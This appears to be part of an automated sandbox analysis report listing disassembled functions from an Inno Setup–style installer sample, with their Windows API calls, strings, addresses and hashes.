GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227

Strings

GetThemeString, xrefs: 0044B015
GetThemeBackgroundContentRect, xrefs: 0044AF2B, 0044AF3D
GetThemeRect, xrefs: 0044B081
OpenThemeData, xrefs: 0044AEE3
GetThemeSysBool, xrefs: 0044B111
GetThemeEnumValue, xrefs: 0044B04B
GetThemeSysSize, xrefs: 0044B123
GetThemeTextMetrics, xrefs: 0044AF73
GetThemePartSize, xrefs: 0044AF4F
GetThemeFilename, xrefs: 0044B0DB
IsThemeDialogTextureEnabled, xrefs: 0044B1B3
GetThemeInt, xrefs: 0044B039
GetCurrentThemeName, xrefs: 0044B1E9
GetThemeMetric, xrefs: 0044B003
DrawThemeParentBackground, xrefs: 0044B20D
GetWindowTheme, xrefs: 0044B18F
EnableTheming, xrefs: 0044B21F
SetWindowTheme, xrefs: 0044B0C9
GetThemeBackgroundRegion, xrefs: 0044AF85
GetThemeDocumentationProperty, xrefs: 0044B1FB
DrawThemeIcon, xrefs: 0044AFBB
IsThemePartDefined, xrefs: 0044AFCD
DrawThemeText, xrefs: 0044AF19
GetThemeSysString, xrefs: 0044B147
GetThemeBool, xrefs: 0044B027
GetThemeColor, xrefs: 0044AFF1
GetThemeSysFont, xrefs: 0044B135
GetThemeAppProperties, xrefs: 0044B1C5
GetThemeMargins, xrefs: 0044B093
GetThemePosition, xrefs: 0044B05D
DrawThemeEdge, xrefs: 0044AFA9
EnableThemeDialogTexture, xrefs: 0044B1A1
GetThemeIntList, xrefs: 0044B0A5
IsAppThemed, xrefs: 0044B17D
HitTestThemeBackground, xrefs: 0044AF97
IsThemeActive, xrefs: 0044B16B
DrawThemeBackground, xrefs: 0044AF07
GetThemeSysColorBrush, xrefs: 0044B0FF
GetThemePropertyOrigin, xrefs: 0044B0B7
GetThemeTextExtent, xrefs: 0044AF61
GetThemeSysColor, xrefs: 0044B0ED
GetThemeSysInt, xrefs: 0044B159
IsThemeBackgroundPartiallyTransparent, xrefs: 0044AFDF
GetThemeFont, xrefs: 0044B06F
uxtheme.dll, xrefs: 0044AECE
CloseThemeData, xrefs: 0044AEF5
SetThemeAppProperties, xrefs: 0044B1D7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$LibraryLoadVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 1968650500-2910565190
Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E

Function 00457CE8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00457D4F
QueryPerformanceCounter.KERNEL32(02183858,00000000,00457FE2,?,?,02183858,00000000,?,004586DE,?,02183858,00000000), ref: 00457D58
GetSystemTimeAsFileTime.KERNEL32(02183858,02183858), ref: 00457D62
GetCurrentProcessId.KERNEL32(?,02183858,00000000,00457FE2,?,?,02183858,00000000,?,004586DE,?,02183858,00000000), ref: 00457D6B
CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02183858,02183858), ref: 00457DEF
CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

64-bit helper EXE wasn't extracted, xrefs: 00457D43
i, xrefs: 00457ECC
CreateProcess, xrefs: 00457F22
CreateNamedPipe, xrefs: 00457DFF
SetNamedPipeHandleState, xrefs: 00457E79
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00457DB7
helper %d 0x%x, xrefs: 00457EF8
Starting 64-bit helper process., xrefs: 00457D1D
CreateFile, xrefs: 00457E45
Cannot utilize 64-bit features on this version of Windows, xrefs: 00457D30
Helper process PID: %u, xrefs: 00457F6C
D, xrefs: 00457E92

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69

Function 00476FAC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02182BE0,?,?,?,02182BE0,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02182BE0,?,?,?,02182BE0,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02182BE0,?,?,?,02182BE0), ref: 00476E74
Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02182BE0,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92

Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02182BE0,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20

ShellExecuteEx.SHELL32(0000003C), ref: 00477034
GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2

Strings

runas, xrefs: 00477001
ShellExecuteEx returned hProcess=0, xrefs: 0047705E
GetExitCodeProcess, xrefs: 004770B7
<, xrefs: 00476FF3
ShellExecuteEx, xrefs: 0047704E
MsgWaitForMultipleObjects, xrefs: 00477097

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 883996979-221126205
Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59

Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58

Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004183A3
GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
GetWindowRect.USER32(?), ref: 004183DC
GetWindowLongA.USER32(?,000000F0), ref: 004183EA
GetWindowLongA.USER32(?,000000F8), ref: 004183FF
ScreenToClient.USER32(00000000), ref: 00418408
ScreenToClient.USER32(00000000,?), ref: 00418413

Strings

,, xrefs: 004183AC

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9

Function 00454B00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B

Strings

SeShutdownPrivilege, xrefs: 00454B27

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E

Function 0045C8A8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6

Strings

ISCryptGetVersion, xrefs: 0045C8AB
ArcFourCrypt, xrefs: 0045C8CB
ArcFourInit, xrefs: 0045C8BB

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$CryptVersion
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 1951258720-508647305
Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C

Function 00496568 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678

Strings

isRS-, xrefs: 004965DF
isRS-???.tmp, xrefs: 004965A9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58

Function 0044C030 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060

Strings

oleacc.dll, xrefs: 0044C03A
LresultFromObject, xrefs: 0044C04A
CreateStdAccessibleObject, xrefs: 0044C05A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 2238633743-1050967733
Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E

Function 0045678C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
SetForegroundWindow.USER32(?), ref: 00456841
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59

Function 00455328 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E

Strings

kernel32.dll, xrefs: 00455353
GetDiskFreeSpaceExA, xrefs: 0045534E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
